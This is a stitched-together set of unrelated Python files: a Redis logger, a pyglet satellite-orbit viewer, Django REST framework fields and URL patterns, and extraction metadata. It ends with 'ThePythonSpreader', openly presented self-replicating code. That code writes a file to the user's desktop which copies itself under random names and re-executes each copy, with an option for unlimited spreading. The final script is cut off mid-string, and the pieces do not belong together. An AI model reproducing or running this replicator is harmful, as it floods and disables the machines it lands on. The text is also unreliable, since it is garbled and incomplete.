"pyinaturalist.models.datetime_now_field"
] |
[((883, 924), 'pyinaturalist.models.field', 'field', ([], {'converter': 'safe_split', 'factory': 'list'}), '(converter=safe_split, factory=list)\n', (888, 924), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((952, 1025), 'pyinaturalist.models.datetime_now_field', 'datetime_now_field', ([], {'doc': '"""Date and time the observation field was created"""'}), "(doc='Date and time the observation field was created')\n", (970, 1025), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((1046, 1065), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (1051, 1065), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((1097, 1116), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (1102, 1116), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((1133, 1152), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (1138, 1152), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((1180, 1258), 'pyinaturalist.models.datetime_now_field', 'datetime_now_field', ([], {'doc': '"""Date and time the observation field was last updated"""'}), "(doc='Date and time the observation field was last updated')\n", (1198, 1258), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((1292, 1311), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (1297, 1311), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((1335, 1354), 'pyinaturalist.models.field', 
'field', ([], {'default': 'None'}), '(default=None)\n', (1340, 1354), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((1371, 1390), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (1376, 1390), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((1415, 1434), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (1420, 1434), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((2103, 2122), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (2108, 2122), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((2151, 2170), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (2156, 2170), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((2187, 2206), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (2192, 2206), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((2227, 2246), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (2232, 2246), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((2266, 2285), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (2271, 2285), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((2302, 2321), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (2307, 2321), False, 'from 
pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((2344, 2363), 'pyinaturalist.models.field', 'field', ([], {'default': 'None'}), '(default=None)\n', (2349, 2363), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((2386, 2483), 'pyinaturalist.models.LazyProperty', 'LazyProperty', (['Taxon.from_json'], {'type': 'Taxon', 'doc': '"""Taxon that the observation field applies to"""'}), "(Taxon.from_json, type=Taxon, doc=\n 'Taxon that the observation field applies to')\n", (2398, 2483), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n'), ((2514, 2611), 'pyinaturalist.models.LazyProperty', 'LazyProperty', (['User.from_json'], {'type': 'User', 'doc': '"""User that applied the observation field value"""'}), "(User.from_json, type=User, doc=\n 'User that applied the observation field value')\n", (2526, 2611), False, 'from pyinaturalist.models import BaseModel, LazyProperty, Taxon, User, datetime_now_field, define_model, field\n')]
|
import redis
class ClueLogger:
    """Appends model/value entries to a Redis stream named after `block`."""

    def __init__(self, block, model, host='redis'):
        """
        Args:
            block: Name of the Redis stream to append to.
            model: Accepted for interface compatibility but not stored; each
                `out()` call supplies the model explicitly.
            host: Redis hostname. Previously hard-coded to 'redis'; now a
                parameter so the old default remains backward-compatible.
        """
        self.block = block
        self.r = redis.StrictRedis(host)

    def out(self, model, value):
        """XADD one {'model', 'value'} entry onto the stream."""
        self.r.xadd(self.block, {'model': model, 'value': value})
|
[
"redis.StrictRedis"
] |
[((115, 141), 'redis.StrictRedis', 'redis.StrictRedis', (['"""redis"""'], {}), "('redis')\n", (132, 141), False, 'import redis\n')]
|
# Homework for UB DMS 423 - Fall 14
# by <NAME>
#
# Real-time Satellite Visualization
# Input Data type: TLS(Two-line element set)
# Can be found at http://www.celestrak.com/NORAD/elements/
#
# How to control:
# Click a satellite to display its orbit.
# Press H to show/hide all orbits on-screen.
# Press UP/DOWN to change satellite category.
# Press LEFT/RIGHT to adjust orbit interval for line drawing.
#
import ephem, datetime, math, urllib.request, urllib.parse, urllib.error
from pyglet.gl import *
# Presumably [display label, celestrak element-set name] pairs — confirm against fetch code
resource = [["GlobalStar", "globalstar"]]
window = pyglet.window.Window(1024,576)  # main render window (16:9)
total = 50      # orbit samples drawn on each side of "now" (see init_line)
interval = 20   # seconds between consecutive orbit samples
batch = pyglet.graphics.Batch()  # shared batch for satellite circle shapes
class Background:
    """Textured quad (e.g. the world map) drawn behind the satellites."""
    def __init__(self, x,y, xoffset,yoffset, texturefile):
        # Quad spans (xoffset, yoffset) .. (xoffset+x, yoffset+y),
        # mapped to the full texture via (0,0)..(1,1) coordinates.
        self.texture = pyglet.image.load(texturefile).get_texture()
        self.vlist = pyglet.graphics.vertex_list(4, ('v2f', [xoffset,yoffset, xoffset+x,yoffset, xoffset,yoffset+y, xoffset+x,yoffset+y]), ('t2f', [0,0, 1,0, 0,1, 1,1]))
    def draw(self):
        # Enable alpha blending and texturing, then draw the quad
        glEnable(GL_BLEND)
        glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
        glColor3f(1,1,1)
        glEnable(GL_TEXTURE_2D)
        glBindTexture(GL_TEXTURE_2D, self.texture.id)
        glPushMatrix()
        self.vlist.draw(GL_TRIANGLE_STRIP)
        glPopMatrix()
        # Unbind and restore GL state so later draws are untextured/unblended
        glBindTexture(GL_TEXTURE_2D, 0)
        glDisable(GL_TEXTURE_2D)
        glDisable(GL_BLEND)
glDisable(GL_BLEND)
class Satellite:
    """One tracked satellite: position marker, label, halo and orbit lines.

    l1/l2 are the two TLE lines; yoffset shifts the map vertically on screen.
    NOTE(review): the `name` parameter is ignored — ephem.readtle is called
    with the literal "GS"; the on-screen label uses self.e.name instead.
    """
    def __init__(self, name, l1, l2, yoffset):
        self.e = ephem.readtle("GS", l1, l2)
        self.vlist = pyglet.graphics.vertex_list(4, ("v2f",[-1,1, -1,-1, 1,-1, 1,1]))
        self.circle = pyglet.shapes.Circle(0, 0, 1, color=(245,120,76), batch=batch)
        # size is the click/draw radius; showline toggles the orbit trace.
        self.size = 3
        self.showline = 0
        self.yoffset = yoffset
    def compute(self):
        """Update screen position (and label) from the current UTC time."""
        self.e.compute(datetime.datetime.utcnow())
        self.long = math.degrees(float(self.e.sublong))
        self.lat = math.degrees(float(self.e.sublat))
        # Map lon/lat degrees to the 1024x512 map: 128 px per 45 degrees.
        self.x = (self.long * 128/45) + 512
        self.y = (self.lat * 128/45) + 256 + self.yoffset
        self.label = pyglet.text.Label(self.e.name, x=7,y=0, anchor_y="center", color=(255,255,255,255))
    def draw(self):
        """Draw the opaque satellite dot plus its name label."""
        glEnable(GL_BLEND)
        glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
        glColor4f(1,0,0,1)
        self.circle.opacity = 255
        glPushMatrix()
        glTranslatef(self.x, self.y, 0)
        glRotatef(30, 0, 0, 1)
        self.label.draw()
        glScalef(self.size, self.size, self.size)
        #self.vlist.draw(GL_TRIANGLE_FAN)
        self.circle.draw()
        glPopMatrix()
        glDisable(GL_TEXTURE_2D)
        glDisable(GL_BLEND)
    def draw_alpha(self):
        """Draw a large translucent halo around the satellite position."""
        glEnable(GL_BLEND)
        glBlendFunc(GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
        #glColor4f(.2,.7,.2,.5)
        self.circle.opacity = 50
        glPushMatrix()
        glTranslatef(self.x, self.y, 0)
        glRotatef(0, 0, 0, 0)
        self.label.draw()
        glScalef(40, 40, 40)
        #self.vlist.draw(GL_TRIANGLE_FAN)
        self.circle.draw()
        glPopMatrix()
        glDisable(GL_TEXTURE_2D)
        glDisable(GL_BLEND)
    def draw_line(self):
        """Recompute and draw the orbit trace; alpha comes from showline."""
        self.init_line()
        glEnable(GL_BLEND)
        glColor4f(.7,.7,.7,self.showline)
        glPushMatrix()
        for x in self.vline_list:
            x.draw(GL_LINE_STRIP)
        glPopMatrix()
        glDisable(GL_BLEND)
    def init_line(self):
        """Sample the orbit around "now" and split the polyline at map edges.

        Samples 2*total points spaced `interval` seconds apart. When two
        consecutive points jump more than 600 px horizontally, the satellite
        wrapped around the map edge, so the current polyline is closed and a
        new one started on the opposite side (avoids a line across the map).
        """
        self.lines, self.vline_list, current_line = [], [], []
        for x in range(-total,total):
            temp = datetime.datetime.utcnow() + datetime.timedelta(seconds=interval*x)
            self.e.compute(temp)
            x = (math.degrees(float(self.e.sublong)) * 128/45) + 512
            y = (math.degrees(float(self.e.sublat)) * 128/45) + 256 + self.yoffset
            if len(current_line) > 1:
                # TO AVOID LINE FROM LEFT TO RIGHT
                temp_x, temp_y = current_line[-2], current_line[-1]
                if temp_x - x > 600:
                    # From right edge to left edge
                    current_line.extend((x+1024,y))
                    self.lines.append(current_line)
                    current_line = []
                    current_line.extend((temp_x-1024,temp_y))
                elif temp_x - x < -600:
                    # From left edge to right edge
                    current_line.extend((x-1024,y))
                    self.lines.append(current_line)
                    current_line = []
                    current_line.extend((temp_x+1024,temp_y))
            current_line.extend((x,y))
        self.lines.append(current_line)
        for x in self.lines:
            self.vline_list.append(pyglet.graphics.vertex_list(int(len(x)/2), ("v2f", x)))
def init():
    """Load the first satellite set and build the background and HUD labels."""
    global background_map, background_banner, category_num
    global text_current_set, text_current_time, text_infos, text_infos_2, text_infos_3
    open_new_file(0)
    category_num = 0
    #background_map = Background(1024,512,0,64,"assets/blue.jpg")
    #background_map = Background(1024,512,0,64,"assets/bluer.jpg")
    background_map = Background(1024,512,0,64,"assets/map2_4096.png")
    #background_banner = Background(1024,128,0,0,"assets/bg.png")
    # HUD text: current category, UTC clock, and the three help lines.
    text_current_set = pyglet.text.Label("Sats on Screen: " + resource[category_num][0], x=15, y=42, anchor_y="center", color=(255,255,255,200))
    text_current_time = pyglet.text.Label("UTC Time: " + datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S"), x=15, y=22, anchor_y="center", color=(255,255,255,200))
    text_infos = pyglet.text.Label("Click a satellite to display its orbit, Press H to show/hide all orbits on-screen.", x=460, y=50, anchor_y="center", color=(255,255,255,200))
    text_infos_2 = pyglet.text.Label("Press UP/DOWN to change satellite category.", x=460, y=32, anchor_y="center", color=(255,255,255,200))
    text_infos_3 = pyglet.text.Label("Press LEFT/RIGHT to adjust orbit interval for line drawing.", x=460, y=14, anchor_y="center", color=(255,255,255,200))
@window.event
def on_draw():
    """Per-frame render: background, HUD text, then every satellite layer."""
    glClear(GL_COLOR_BUFFER_BIT)
    background_map.draw()
    #background_banner.draw()
    text_current_set.draw()
    text_current_time.draw()
    text_infos.draw()
    text_infos_2.draw()
    text_infos_3.draw()
    for x in sats:
        x.draw()
        x.draw_alpha()
        x.draw_line()
def update(dt):
    """Scheduled tick: refresh the HUD labels and recompute all positions."""
    global text_current_time, text_current_set
    text_current_time = pyglet.text.Label("UTC Time: " + datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M:%S"), x=15, y=22, anchor_y="center", color=(255,255,255,200))
    text_current_set = pyglet.text.Label("Sats on Screen: " + resource[category_num][0], x=15, y=42, anchor_y="center", color=(255,255,255,200))
    for x in sats:
        x.compute()
def distance(a, b):
    """Return the squared Euclidean distance between 2-D points *a* and *b*.

    Kept squared (no sqrt) because callers compare it against a squared
    radius, so the root would be wasted work.
    """
    dx = a[0] - b[0]
    dy = a[1] - b[1]
    return dx * dx + dy * dy
def open_new_file(num):
    """Download the TLE set for category *num* and rebuild the satellite list.

    TLE data comes in groups of three lines (name, line 1, line 2).
    """
    global source, lines, sats, show_all_line
    # source = open("data/"+resource[num][1] + ".txt")
    # Uncomment following lines for online access
    name = resource[num][1]
    url = "http://www.celestrak.com/NORAD/elements/" + name +".txt"
    source = urllib.request.urlopen(url).readlines()
    lines = [line.decode("utf-8").replace("\r\n", "") for line in source]
    sats = []
    show_all_line = 0
    for x in range(int(len(lines) / 3)):
        e = Satellite(lines[x * 3], lines[x * 3 + 1], lines[x * 3 + 2], 64)
        e.compute()
        sats.append(e)
@window.event
def on_mouse_press(x,y, dx,dy):
    """Toggle the orbit line of whichever satellite was clicked.

    NOTE(review): pyglet passes (x, y, button, modifiers) to this handler —
    the names dx/dy are misleading but unused, so behavior is unaffected.
    """
    global show_all_line
    show_all_line = 0
    refresh_all_line([None])
    for o in sats:
        # Hit test against the squared click radius (distance() is squared).
        if distance((o.x,o.y), (x,y)) <= o.size ** 2:
            o.showline = int(not o.showline)
            refresh_all_line([o])
def refresh_all_line(withouts):
    """Apply the global show_all_line flag to every satellite except *withouts*.

    NOTE: call sites always pass a single-element list ([None] or [sat]), so
    the nested comparison below effectively skips just that one satellite.
    """
    for o in sats:
        for w in withouts:
            if o!= w:
                o.showline = show_all_line
@window.event
def on_key_press(symbol, modifiers):
    """Keyboard controls: H toggles all orbits, UP/DOWN cycles category,
    LEFT/RIGHT adjusts the orbit sampling interval (clamped to 10..500 s)."""
    global show_all_line, category_num, interval
    if symbol == pyglet.window.key.H:
        show_all_line = not show_all_line
        refresh_all_line([None])
    elif symbol == pyglet.window.key.UP:
        # Cycle forward through resource, wrapping to 0 at the end.
        category_num += 1
        if category_num == len(resource):
            category_num = 0
        open_new_file(category_num)
        update(0)
    elif symbol == pyglet.window.key.DOWN:
        # Cycle backward, wrapping to the last category.
        category_num -= 1
        if category_num == -1:
            category_num = len(resource)-1
        open_new_file(category_num)
        update(0)
    elif symbol == pyglet.window.key.LEFT:
        interval -= 20
        if interval < 10:
            interval = 10
    elif symbol == pyglet.window.key.RIGHT:
        interval += 20
        if interval > 500:
            interval = 500
# Entry point: load data and UI, recompute positions once per second,
# then hand control to pyglet's event loop.
init()
pyglet.clock.schedule_interval(update, 1/1.0)
pyglet.app.run()
|
[
"ephem.readtle",
"datetime.timedelta",
"datetime.datetime.utcnow"
] |
[((1373, 1400), 'ephem.readtle', 'ephem.readtle', (['"""GS"""', 'l1', 'l2'], {}), "('GS', l1, l2)\n", (1386, 1400), False, 'import ephem, datetime, math, urllib.request, urllib.parse, urllib.error\n'), ((1671, 1697), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (1695, 1697), False, 'import ephem, datetime, math, urllib.request, urllib.parse, urllib.error\n'), ((3115, 3141), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (3139, 3141), False, 'import ephem, datetime, math, urllib.request, urllib.parse, urllib.error\n'), ((3144, 3184), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': '(interval * x)'}), '(seconds=interval * x)\n', (3162, 3184), False, 'import ephem, datetime, math, urllib.request, urllib.parse, urllib.error\n'), ((4704, 4730), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (4728, 4730), False, 'import ephem, datetime, math, urllib.request, urllib.parse, urllib.error\n'), ((5699, 5725), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (5723, 5725), False, 'import ephem, datetime, math, urllib.request, urllib.parse, urllib.error\n')]
|
from collections import OrderedDict
from django.utils.translation import gettext_lazy as _
from model_utils import Choices
from rest_framework import serializers
from rest_framework.fields import empty, Field, SkipField
from rest_framework.utils import model_meta
from rest_framework_recursive.fields import RecursiveField
from unicef_restlib.utils import get_attribute_smart
class builtin_field:
    """Sentinel marker meaning "no explicit write field given — build one"."""
    pass
class ModelChoiceField(serializers.PrimaryKeyRelatedField):
    """PK-related field whose choices are computed lazily from the queryset.

    Subclasses implement get_choice() to map a queryset object to a
    (value, display) pair.
    """
    default_error_messages = {
        'does_not_exist': _('Invalid option "{pk_value}" - option is not available.'),
    }

    @property
    def choices(self):
        # _choices starts out as the bound method below; the first access
        # calls it and caches the resulting OrderedDict in its place.
        if hasattr(self._choices, '__call__'):
            self._choices = self._choices()
        return self._choices

    def get_choice(self, obj):
        # Must return a (value, display) pair for *obj*.
        raise NotImplementedError

    def _choices(self):
        return OrderedDict(map(self.get_choice, self.get_queryset()))
class SeparatedReadWriteField(Field):
    """Field that uses one serializer field for reading and another for writing.

    If write_field is left as the builtin_field sentinel, a write field is
    auto-built from the parent ModelSerializer's model metadata at bind time.
    """
    read_field = None
    write_field = None

    def __init__(self, read_field, write_field=builtin_field, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.read_field = read_field
        self.write_field = write_field
        # update fields from kwargs
        for kwarg_name in {'label', } & set(kwargs.keys()):
            setattr(self.read_field, kwarg_name, kwargs[kwarg_name])
            if self.write_field is not builtin_field:
                setattr(self.write_field, kwarg_name, kwargs[kwarg_name])

    def to_representation(self, value):
        # Reads delegate to the read field...
        return self.read_field.to_representation(value)

    def to_internal_value(self, data):
        # ...writes and validation delegate to the write field.
        return self.write_field.to_internal_value(data)

    def get_validators(self):
        return self.write_field.get_validators()

    def validate_empty_values(self, data):
        """
        Validate empty values, and either:

        * Raise `ValidationError`, indicating invalid data.
        * Raise `SkipField`, indicating that the field should be ignored.
        * Return (True, data), indicating an empty value that should be
          returned without any further validation being applied.
        * Return (False, data), indicating a non-empty value, that should
          have validation applied as normal.
        """
        if data is empty:
            if getattr(self.root, 'partial', False):
                raise SkipField()
            if self.write_field.required:
                self.fail('required')
            return (True, self.get_default())

        if data is None:
            if not self.write_field.allow_null:
                self.fail('null')
            return (True, None)

        return (False, data)

    def _build_field(self):
        """Auto-build the write field from the parent serializer's model.

        NOTE(review): self._kwargs is read here but never assigned in this
        class — presumably set elsewhere (or by a subclass); verify.
        """
        model = getattr(self.parent.Meta, 'model')
        depth = getattr(self.parent.Meta, 'depth', 0)
        info = model_meta.get_field_info(model)

        # Determine any extra field arguments and hidden fields that
        # should be included
        extra_kwargs = self.parent.get_extra_kwargs()
        extra_kwargs.update(self._kwargs)
        extra_kwargs, hidden_fields = self.parent.get_uniqueness_extra_kwargs(
            [self.field_name], [self], extra_kwargs
        )

        extra_field_kwargs = {
            key: value for key, value in self._kwargs.items()
            if key not in ['read_field']
        }

        # Determine the serializer field class and keyword arguments.
        field_class, field_kwargs = self.parent.build_field(
            self.field_name, info, model, depth
        )

        # Include any kwargs defined in `Meta.extra_kwargs`
        extra_field_kwargs.update(
            extra_kwargs.get(self.field_name, {})
        )
        field_kwargs = self.parent.include_extra_kwargs(
            field_kwargs, extra_field_kwargs
        )

        # Create the serializer field.
        return field_class(**field_kwargs)

    def bind(self, field_name, parent):
        super().bind(field_name, parent)
        self.read_field.bind(field_name, parent)
        # Only now is the parent serializer available, so the sentinel can
        # be replaced with a concrete, model-derived write field.
        if self.write_field is builtin_field:
            self.write_field = self._build_field()
        self.write_field.bind(field_name, parent)
class WriteListSerializeFriendlyRecursiveField(RecursiveField):
    """RecursiveField variant that propagates the bound serializer's context.

    The proxied serializer created by RecursiveField can end up without a
    context; copy it over from the parent captured in bind_args when missing.
    """
    @property
    def proxied(self):
        self._proxied = super().proxied
        if (self._proxied and not self._proxied.context and self.bind_args[1] and self.bind_args[1].context):
            self._proxied.context = self.bind_args[1].context
        return self._proxied
class CommaSeparatedExportField(serializers.Field):
    """Read-only field rendering a collection as a comma-separated string.

    If ``export_attr`` is given, that attribute is extracted from each item
    before joining. Duplicates and falsy items are dropped.
    """
    export_attr = None

    def __init__(self, *args, **kwargs):
        self.export_attr = kwargs.pop('export_attr', None)
        super().__init__(*args, **kwargs)

    def get_attribute(self, instance):
        # Like DRF's default get_attribute, but resolves dotted/smart paths.
        try:
            return get_attribute_smart(instance, self.source_attrs)
        except (KeyError, AttributeError) as exc:
            if not self.required and self.default is empty:
                raise SkipField()
            # Re-raise with a descriptive message mirroring DRF's own wording.
            msg = (
                'Got {exc_type} when attempting to get a value for field '
                '`{field}` on serializer `{serializer}`.\nThe serializer '
                'field might be named incorrectly and not match '
                'any attribute or key on the `{instance}` instance.\n'
                'Original exception text was: {exc}.'.format(
                    exc_type=type(exc).__name__,
                    field=self.field_name,
                    serializer=self.parent.__class__.__name__,
                    instance=instance.__class__.__name__,
                    exc=exc
                )
            )
            raise type(exc)(msg)

    def to_representation(self, value):
        # set() removes duplicates (ordering is therefore unspecified).
        value = set(value)
        if self.export_attr:
            value = [get_attribute_smart(item, self.export_attr) for item in value]
        return ', '.join([str(item) for item in value if item])
class DynamicChoicesField(serializers.ChoiceField):
    """ChoiceField whose choices can be swapped at runtime via the setter."""

    def __init__(self, *args, **kwargs):
        self._current_choices = {}
        super().__init__(*args, **kwargs)

    @property
    def choices(self):
        return self._current_choices

    @choices.setter
    def choices(self, value):
        self._current_choices = value

    @property
    def choice_strings_to_values(self):
        # Recomputed on every access so it always reflects current choices.
        if isinstance(self.choices, Choices):
            # NOTE(review): iterating a model_utils Choices yields
            # (value, display) pairs — confirm the intended mapping here.
            return {k: v for k, v in self.choices}
        return {
            str(key): key for key in self.choices.keys()
        }

    @choice_strings_to_values.setter
    def choice_strings_to_values(self, value):
        # Intentionally a no-op: the base __init__ assigns this attribute,
        # but the mapping is derived dynamically in the property above.
        return
class FunctionRelatedField(serializers.RelatedField):
    """Related field whose representation is produced by an injected callable."""

    def __init__(self, callable_function=None, **kwargs):
        assert callable_function is not None, 'The `callable_function` argument is required.'
        self.callable_function = callable_function
        super().__init__(**kwargs)

    def to_representation(self, obj):
        # Serialization is delegated entirely to the injected callable.
        return self.callable_function(obj)
|
[
"unicef_restlib.utils.get_attribute_smart",
"rest_framework.utils.model_meta.get_field_info",
"rest_framework.fields.SkipField",
"django.utils.translation.gettext_lazy"
] |
[((530, 589), 'django.utils.translation.gettext_lazy', '_', (['"""Invalid option "{pk_value}" - option is not available."""'], {}), '(\'Invalid option "{pk_value}" - option is not available.\')\n', (531, 589), True, 'from django.utils.translation import gettext_lazy as _\n'), ((2829, 2861), 'rest_framework.utils.model_meta.get_field_info', 'model_meta.get_field_info', (['model'], {}), '(model)\n', (2854, 2861), False, 'from rest_framework.utils import model_meta\n'), ((4799, 4847), 'unicef_restlib.utils.get_attribute_smart', 'get_attribute_smart', (['instance', 'self.source_attrs'], {}), '(instance, self.source_attrs)\n', (4818, 4847), False, 'from unicef_restlib.utils import get_attribute_smart\n'), ((2372, 2383), 'rest_framework.fields.SkipField', 'SkipField', ([], {}), '()\n', (2381, 2383), False, 'from rest_framework.fields import empty, Field, SkipField\n'), ((5786, 5829), 'unicef_restlib.utils.get_attribute_smart', 'get_attribute_smart', (['item', 'self.export_attr'], {}), '(item, self.export_attr)\n', (5805, 5829), False, 'from unicef_restlib.utils import get_attribute_smart\n'), ((4980, 4991), 'rest_framework.fields.SkipField', 'SkipField', ([], {}), '()\n', (4989, 4991), False, 'from rest_framework.fields import empty, Field, SkipField\n')]
|
# -*- coding: utf-8 -*-
from django.conf.urls import url, include
from django.views.generic import TemplateView
# Plain-text meta files (robots.txt / humans.txt) served from templates.
cyborg_patterns = [
    url(
        r'^robots\.txt$',
        TemplateView.as_view(
            template_name='cyborg/robots.txt',
            content_type='text/plain'
        ),
        name='robots'
    ),
    url(
        r'^humans\.txt$',
        TemplateView.as_view(
            template_name='cyborg/humans.txt',
            content_type='text/plain'
        ),
        name='humans'
    ),
]

urlpatterns = [
    # NOTE(review): include(..., namespace=...) without an app_name/2-tuple
    # is deprecated since Django 2.0 — confirm this project targets Django 1.x.
    url(r'', include(cyborg_patterns, namespace='cyborg'))
]
|
[
"django.views.generic.TemplateView.as_view",
"django.conf.urls.include"
] |
[((176, 263), 'django.views.generic.TemplateView.as_view', 'TemplateView.as_view', ([], {'template_name': '"""cyborg/robots.txt"""', 'content_type': '"""text/plain"""'}), "(template_name='cyborg/robots.txt', content_type=\n 'text/plain')\n", (196, 263), False, 'from django.views.generic import TemplateView\n'), ((366, 453), 'django.views.generic.TemplateView.as_view', 'TemplateView.as_view', ([], {'template_name': '"""cyborg/humans.txt"""', 'content_type': '"""text/plain"""'}), "(template_name='cyborg/humans.txt', content_type=\n 'text/plain')\n", (386, 453), False, 'from django.views.generic import TemplateView\n'), ((545, 589), 'django.conf.urls.include', 'include', (['cyborg_patterns'], {'namespace': '"""cyborg"""'}), "(cyborg_patterns, namespace='cyborg')\n", (552, 589), False, 'from django.conf.urls import url, include\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Code by: @53686b (Github/Twitter)
# Version: 1.0.1 (23/03/2021)
"""
ThePythonSpreader is a script that creates files capable of multiplying themselves.
The first file copies itself to a new file, which results of the addition of a random number
to the original file name, and then executes it. Each new file will repeat the same pattern
indefinetely.
Some customization is allowed through the settings found between lines 40 and 89.
For safety reasons the self-multiplying behavior of each copy is deactivated by default.
To activate it, check line 172.
Make sure to use it only in a safe environment, such as a disposable Virtual Machine.
*** Full responsibility for any damage caused by this script goes to the user. ***
"""
############################################################################################
###### ## ## ####### # ## ## ## ## ## # #######
###### ### # ## ###### #### ### # ### # ##### ### # ### # ##### ### ######
###### ### ######## ## ## ## # # ### # # #######
###### ######## ########### # ###### ## ## ##### ### # ### # ##### ## #######
###### ######## ### ## ## ###### ### # # ### # ## # ### ######
############################################################################################
import os
from getpass import getuser
from random import randrange
user = getuser()
# ---------------------------------------------------------------------------
# Default settings
# ---------------------------------------------------------------------------
name , safetyDelay , randomRange = 'Spreader' , 1 , 10
# name - Name of the file.
# safetyDelay - Time it takes to create a new file. (float, seconds)
# randomRange - amount of file each new one creates.

# Choose the directory where you want to create the spreader file. Must be a string.
# (Default = "c:\\Users\\" + user + "\\desktop\\")
targetDirectory = "c:\\Users\\" + user + "\\desktop\\"

# ---------------------------------------------------------------------------
# Advanced settings
# ---------------------------------------------------------------------------
# Choose if you want to create a ReadMe file in the targetted directory.
ReadMe = False
txt = "This is a message"

# After-replication behaviour of each copy:
#   0 KeepSelf | 1 DeleteContent | 2 TurnIntoGarbage | 3 DeleteSelf
fileLife = 0

# ---------------------------------------------------------------------------
# Size
# ---------------------------------------------------------------------------
amountOfGarbage = 1 # (int, kbytes~)
# If you chose the TurnIntoGarbage option.
makeThemExtraHeavy = False
amountOfExtraGarbage = 1 # (int, kbytes~)
# makeThemExtraHeavy - Adds garbage to the files in order to make them heavier.
# This is independent from the TurnIntoGarbage option as it leaves the code alone.
garbage , extraGarbage = "" , ""
# Payload written over each copy when fileLife == 2 (TurnIntoGarbage):
# ten 100-character lines, roughly 1 KB per unit of amountOfGarbage.
if fileLife == 2:
    garbage = """
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################"""
# Extra padding appended to every generated file when makeThemExtraHeavy is on.
if makeThemExtraHeavy:
    extraGarbage = """
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################
####################################################################################################"""
# Creates the ReadMe file if the option is selected.
if ReadMe:
    # Context manager guarantees the handle is closed even if the write fails.
    with open(targetDirectory + "README" + ".txt", "w") as read:
        read.write(txt)
# Creates the first file.
f = open(targetDirectory + name + ".py" , "w")
f.write(
# Adds the configs chosen to the DNA of the the file.
"x = " + "\"" + name + "\"" + "\n"
"y = " + str(safetyDelay) + "\n"
"z = " + str(randomRange) + "\n"
"v = " + str(fileLife) + "\n"
"t = '''" + garbage + "'''\n"
# Adds the reproductive DNA to the file.
"""
import os
from time import sleep
from random import randrange
from shutil import copyfile
i = randrange(z)
nL = len(x)
os.path.basename(__file__)
nNS = (os.path.basename(__file__)[nL:])[:-3] + str(i)
s = __file__
d = os.path.join(os.path.dirname(__file__), x + nNS + '.py')
copyfile(s, d)
sleep(y)
k = []
for g in os.listdir(os.path.abspath(os.path.dirname(__file__))):
for n in range(0,z):
if g == (os.path.basename(__file__)[:-3] + str(n) + ".py"):
k.append(g)
if v == 0 and len(k) == z:
exec(open(__file__).read())
elif v == 1 and len(k) == z:
f = open(__file__ , "w")
f.write("")
f.close
elif v == 2 and len(k) == z:
f = open(__file__ , "w")
f.write(t)
f.close
elif v == 3 and len(k) == z:
os.remove(__file__)
else:
exec(open(__file__).read())\n"""
############################################################################################
############ The Line Below Will Make The Program Spread Without Limits ############
############################################################################################
""" #os.system(os.path.dirname(__file__), name + nNS + '.py')"""
